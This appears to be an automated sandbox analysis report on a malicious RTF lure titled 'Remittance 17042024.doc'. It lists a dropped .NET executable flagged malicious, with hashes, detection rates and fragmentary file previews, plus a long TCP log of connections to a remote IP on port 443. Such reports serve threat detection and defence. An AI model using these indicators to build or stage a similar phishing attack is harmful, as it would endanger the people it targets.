                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):722440
                                                                                      Entropy (8bit):7.916807713584016
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:5rOrr4PrrF4LtCVp0Vk1zlFrhHn6SvUyma5+2wqxsKoLlD5fRXj+9Y/6wuz/CkR:pDimlFrhH6IUzBqxdEtRXa9Y/huz/x
                                                                                      MD5:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      SHA1:26126C700F70DE2E42A173214B52FE6A38C93BB8
                                                                                      SHA-256:F2664BDFD035D146843F1575528EB9694A98B32F99488058A0E04885AD62E9C2
                                                                                      SHA-512:31D2C6284375E7A089216FBA4EC7DC424ACE8FB5AE5D5EE620974831C73386D9F360CBC06CBE696579B27EA442A8141A1DFEC502AA7CDE1D623F74D2F5BD2BDF
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      • Antivirus: Virustotal, Detection: 63%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t..f................................. ........@.. ....................... ............@.....................................S........................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......HS..P............................................................0..A....... .........%.[...(.....\... |........%.k...(.....l...(....*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(P...+....s....}......j}....*..0............{......*...0..Q..........E........ ... .......+.............{.....(h.......,...+..+...

                                                                                      C:\Users\user\Desktop\~$mittance 17042024.doc

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.503835550707526
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyaKoKbi/YYbVWNK5rAGllln:vdsCkWtzKXbigYIK++l
                                                                                      MD5:01DADEB867D8CD283A1F21D4FDF11903
                                                                                      SHA1:88993BBAA2E620D6F18682B37BCEF27BD0AE3DB4
                                                                                      SHA-256:0468E3450BF6A972B9E023034768227DC07C1FFD07C5F612FBBA187794658EE0
                                                                                      SHA-512:344243CF8AC932C4988ECB175E8ACB3A65A0092EB15CD8982925A44F75AEDF33A458C67F597F1F6D89A5F426E649F139A36D1BF31191CE54A581671EE761223F
                                                                                      Malicious:false
                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:Rich Text Format data, version 1
                                                                                      Entropy (8bit):4.206312169012919
                                                                                      TrID:
                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                      File name:Remittance 17042024.doc
                                                                                      File size:282'583 bytes
                                                                                      MD5:3a70ce88c392ad13548a5337379ec365
                                                                                      SHA1:759142b5f93e6b7821c9eb30639448fc2fd13cd4
                                                                                      SHA256:45d5436e268ed053f251044846ac8f0c5c09015cc87c4ccbdc86c4efbad9e570
                                                                                      SHA512:bb74bce3b6e378864449774e2e7aa8df9b869204a4a0efdc4f405f772cbcc1108feee2e337fa5f66da31e68f62f4ce13f431c3d9179da998e14471d59c0f4ed7
                                                                                      SSDEEP:3072:jsXvKMEesXvKMEesXvKMEesXvKMEesXvKMEesXvKMEIFp+pk:EKMeKMeKMeKMeKMeKM7F8k
                                                                                      TLSH:10547C2ED35E02698F520273AB1B1E94A6BEBB3EB39051B1341C433433D9C7D52266BD
                                                                                      File Content Preview:{\rtf1..{\*\LiWYajVnbq2vF0Usac4BsOtUvdPVRc3zxM77nXv2GfAjHcY24Hm4BVXhpK2PGSYRhsN0Dusz3K0eAuppw0V8EdLgdaHmyvP56g1utlcnVGKNwmbNkD223hacsnsGawu5g9tSr1QdAqvXd88rzJAPfbYd}..{\105212803Document created in earlier version microsoft office word.To view or edit thi

                                                                                      File Icon

                                                                                      Icon Hash:2764a3aaaeb7bdbf

                                                                                      Static RTF Info

                                                                                      Objects

                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                      00001FAA3hno

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 18, 2024 10:23:54.360595942 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.360678911 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:54.360763073 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.381042004 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.381073952 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:54.609918118 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:54.610080957 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.617463112 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.617485046 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:54.617836952 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:54.617980003 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.693471909 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:54.736141920 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108407021 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108500004 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.108530998 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108577967 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.108587027 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108628035 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.108669043 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108731031 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.108781099 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.108849049 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.108895063 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.109090090 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.109100103 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.109128952 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.109149933 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.109175920 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.109239101 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.109297991 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.109325886 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.109379053 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.113404036 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.230571032 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.230766058 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.230799913 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.230860949 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.230869055 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.230912924 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.230951071 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231008053 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231071949 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231122971 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231184006 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231283903 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231317043 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231370926 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231432915 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231509924 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231566906 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231621027 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231695890 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231745005 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231807947 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.231858969 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.231956005 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232014894 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232136965 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232194901 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232320070 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232378960 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232434034 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232494116 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232546091 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232608080 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232659101 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232712984 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232763052 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232820988 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.232872963 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.232927084 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.233190060 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.233248949 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.233316898 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.233372927 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.233414888 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.233469009 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.355880022 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.355957985 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356021881 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356074095 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356158972 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356213093 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356292009 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356343031 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356420040 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356477976 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356534958 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356584072 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356647968 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356703043 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356760025 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356805086 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.356870890 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.356914043 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.357029915 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.357079983 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.357172012 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.357240915 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.357908964 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.357974052 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.358053923 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.358100891 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.358187914 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.358243942 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.358830929 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.358887911 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.358985901 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.359061003 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.361349106 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.361404896 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.361504078 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.361565113 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.361640930 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.361692905 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.361788988 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.361849070 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.361936092 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.362004042 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.362051010 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.362106085 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.482392073 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.482558012 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.482589006 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.482670069 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.482722998 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.482800961 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.482961893 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.483026028 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.483494043 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.483553886 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.484338045 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.484407902 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.484493017 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.484543085 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.485243082 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.485311985 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.485371113 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.485424042 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.485467911 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.485523939 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.486130953 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.486187935 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.486263990 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.486316919 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.486962080 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.487026930 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.487090111 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.487143993 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.487850904 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.487912893 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.488795042 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.488858938 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.488933086 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.488984108 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.489607096 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.489665031 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.489743948 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.489794970 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.490439892 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.490502119 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.490578890 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.490633011 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.491364002 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.491425037 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.491503000 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.491559982 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.491592884 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.491642952 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.606323004 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.606501102 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.606525898 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.606558084 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.606580019 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.606606960 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.606743097 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.606791973 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.606905937 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.606966972 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.607601881 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.607670069 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.609190941 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.609211922 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.609256983 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.609282970 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.609333038 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.609986067 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.610054016 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.610858917 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.610934019 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.611820936 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.611890078 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.611893892 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.611920118 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.611946106 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.611958981 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.612713099 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.612775087 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.614358902 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.614444017 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.614460945 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.614548922 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.614609957 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.616250992 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.616321087 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.616377115 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.616442919 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.617835999 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.617918015 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.617949009 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.617965937 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.617980003 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.618010998 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.618385077 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.618454933 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.618463993 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.618504047 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.620150089 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.620225906 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.620265007 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.620321035 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.621424913 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.621499062 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.621622086 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.621680975 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.621855021 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.621913910 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.622818947 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.622890949 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.622901917 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.622945070 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.624530077 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.624603987 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.625268936 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.625336885 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.625952005 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.626024008 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.626066923 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.626122952 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.627500057 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.627573013 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.627583027 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.627628088 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.627691984 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.627751112 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.733201981 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.733302116 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.733342886 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.733412027 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.734894991 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.734961987 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.735021114 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.735083103 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.736593008 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.736660957 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.736717939 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.736773968 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.738352060 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.738421917 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.738509893 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.738569021 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.740051031 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.740118980 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.740231037 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.740297079 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.742317915 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.742444992 CEST44349161104.21.83.128192.168.2.22
                                                                                      Apr 18, 2024 10:23:55.742489100 CEST49161443192.168.2.22104.21.83.128
                                                                                      Apr 18, 2024 10:23:55.742507935 CEST44349161104.21.83.128192.168.2.22
